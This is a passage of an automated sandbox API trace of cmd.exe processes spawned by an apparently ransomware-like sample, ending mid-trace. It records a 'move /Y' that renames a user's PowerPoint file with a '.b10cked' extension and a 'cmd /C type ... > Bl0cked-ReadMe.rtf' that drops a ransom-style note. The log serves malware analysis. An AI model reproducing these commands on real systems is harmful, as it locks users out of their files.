(_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.824] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.824] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.824] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.824] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.824] _wcsicmp (_String1="PROMPT", 
_String2="RANDOM") returned -2 [0235.824] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.824] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.824] GetEnvironmentStringsW () returned 0x4722b8* [0235.824] FreeEnvironmentStringsW (penv=0x4722b8) returned 1 [0235.824] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.824] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.824] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.824] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.824] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.824] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.824] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.824] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.825] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.825] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.825] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af530 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.825] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af530, lpFilePart=0x2af52c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af52c*="Desktop") returned 0x18 [0235.825] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.825] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af2ac | out: lpFindFileData=0x2af2ac) returned 0x46fff8 [0235.825] FindClose (in: hFindFile=0x46fff8 | out: hFindFile=0x46fff8) returned 1 [0235.825] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af2ac | out: lpFindFileData=0x2af2ac) returned 
0x46fff8 [0235.825] FindClose (in: hFindFile=0x46fff8 | out: hFindFile=0x46fff8) returned 1 [0235.825] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af2ac | out: lpFindFileData=0x2af2ac) returned 0x46fff8 [0235.825] FindClose (in: hFindFile=0x46fff8 | out: hFindFile=0x46fff8) returned 1 [0235.825] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.825] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.825] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.825] GetEnvironmentStringsW () returned 0x472ad8* [0235.826] FreeEnvironmentStringsW (penv=0x472ad8) returned 1 [0235.826] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.826] GetConsoleOutputCP () returned 0x1b5 [0235.826] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.826] GetUserDefaultLCID () returned 0x409 [0235.826] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af670, cchData=128 | out: lpLCData="0") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af670, cchData=128 | out: lpLCData="0") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af670, cchData=128 | out: lpLCData="1") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 
[0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.827] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.827] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.828] GetConsoleTitleW (in: lpConsoleTitle=0x4608d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.828] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.828] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.828] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.828] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.829] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.829] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.829] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.829] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.829] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.829] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.829] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.831] GetConsoleTitleW (in: lpConsoleTitle=0x2af368, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.831] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.831] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0235.831] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.831] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0235.831] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.831] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.832] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0235.832] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.832] _wcsicmp (_String1="move", _String2="REN") returned -5 [0235.832] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.832] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.832] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.832] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.832] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.832] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.832] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.832] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.832] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.832] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.832] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.832] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.832] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.832] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.832] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.832] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.832] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.832] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.832] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.832] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0235.832] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.832] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.832] _wcsicmp (_String1="move", _String2="START") returned -6 [0235.832] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.832] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0235.832] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.833] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af124, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af11c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af11c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.834] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.835] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.835] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.835] _wcsicmp (_String1="FUT5WR~1.PPT", _String2=".") returned 56 [0235.835] _wcsicmp 
(_String1="FUT5WR~1.PPT", _String2="..") returned 56 [0235.835] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wr~1.ppt")) returned 0x20 [0235.835] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x471d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.835] SetErrorMode (uMode=0x0) returned 0x0 [0235.835] SetErrorMode (uMode=0x1) returned 0x0 [0235.836] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", nBufferLength=0x104, lpBuffer=0x2aeaac, lpFilePart=0x2aea94 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", lpFilePart=0x2aea94*="FUT5WR~1.PPT") returned 0x26 [0235.836] SetErrorMode (uMode=0x0) returned 0x1 [0235.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0235.836] _wcsicmp (_String1="FUT5WR~1.PPT", _String2=".") returned 56 [0235.836] _wcsicmp (_String1="FUT5WR~1.PPT", _String2="..") returned 56 [0235.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wr~1.ppt")) returned 0x20 [0235.836] SetErrorMode (uMode=0x0) returned 0x0 [0235.836] SetErrorMode (uMode=0x1) returned 0x0 [0235.836] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", nBufferLength=0x104, lpBuffer=0x2aef28, lpFilePart=0x2aecc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", lpFilePart=0x2aecc0*="FUT5WR~1.PPT") returned 0x26 [0235.836] SetErrorMode (uMode=0x0) returned 0x1 [0235.836] SetErrorMode (uMode=0x0) returned 0x0 [0235.836] SetErrorMode (uMode=0x1) returned 0x0 [0235.836] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x2af130, lpFilePart=0x2aecc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked", lpFilePart=0x2aecc0*="fUt5wrAPeTu.pptx.b10cked") 
returned 0x32 [0235.836] SetErrorMode (uMode=0x0) returned 0x1 [0235.836] SetLastError (dwErrCode=0x0) [0235.836] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wrapetu.pptx.b10cked")) returned 0xffffffff [0235.836] GetLastError () returned 0x2 [0235.836] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x2ae63c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae63c) returned 0x460f08 [0235.836] FindNextFileW (in: hFindFile=0x460f08, lpFindFileData=0x2ae63c | out: lpFindFileData=0x2ae63c) returned 0 [0235.837] GetLastError () returned 0x12 [0235.837] FindClose (in: hFindFile=0x460f08 | out: hFindFile=0x460f08) returned 1 [0235.838] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\FUT5WR~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x471ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x471ae0) returned 0x460f08 [0235.838] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x2ae8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked", lpFilePart=0x0) returned 0x32 [0235.838] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx", nBufferLength=0x104, lpBuffer=0x2ae8d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx", lpFilePart=0x0) returned 0x2a [0235.838] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wrapetu.pptx")) returned 0x20 [0235.838] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\fut5wrapetu.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\fUt5wrAPeTu.pptx.b10cked" (normalized: 
"c:\\users\\eebsym5\\docume~1\\fut5wrapetu.pptx.b10cked"), dwFlags=0x3) returned 1 [0235.839] FindClose (in: hFindFile=0x460f08 | out: hFindFile=0x460f08) returned 1 [0235.839] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ae888 | out: _Buffer=" 1") returned 9 [0235.839] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.839] GetFileType (hFile=0x7) returned 0x2 [0235.928] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.928] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ae814 | out: lpMode=0x2ae814) returned 1 [0235.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.928] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ae848 | out: lpConsoleScreenBufferInfo=0x2ae848) returned 1 [0235.929] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.929] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x2ae888 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.929] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ae86c, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x2ae86c*=0x1a) returned 1 [0235.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.929] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.929] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.929] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.930] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.930] SetConsoleInputExeNameW () returned 0x1 [0235.930] GetConsoleOutputCP () returned 0x1b5 [0235.930] GetCPInfo (in: CodePage=0x1b5, 
lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.930] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.930] exit (_Code=0) Process: id = "640" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0xb04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35108 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35109 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35110 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35111 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 35112 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35113 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35114 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35115 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35116 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35117 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35595 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35596 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35597 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 35598 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35599 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 35600 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35601 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35602 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35603 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35604 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35605 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35606 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35607 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35608 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35609 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 35610 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 
35611 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35612 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 35613 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 35614 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35615 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35616 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 35617 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 35618 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 880 os_tid = 0xb20 [0235.683] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fce4 | out: lpSystemTimeAsFileTime=0x14fce4*(dwLowDateTime=0xbff11ec0, dwHighDateTime=0x1d440a9)) [0235.683] GetCurrentProcessId () returned 0xb04 [0235.683] GetCurrentThreadId () returned 0xb20 [0235.683] GetTickCount () returned 0x40b26 [0235.683] QueryPerformanceCounter (in: lpPerformanceCount=0x14fcdc | out: lpPerformanceCount=0x14fcdc*=29247262033) returned 1 [0235.684] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.684] __set_app_type (_Type=0x1) [0235.684] __p__fmode () returned 0x76b331f4 [0235.684] __p__commode () returned 0x76b331fc [0235.684] SetUnhandledExceptionFilter 
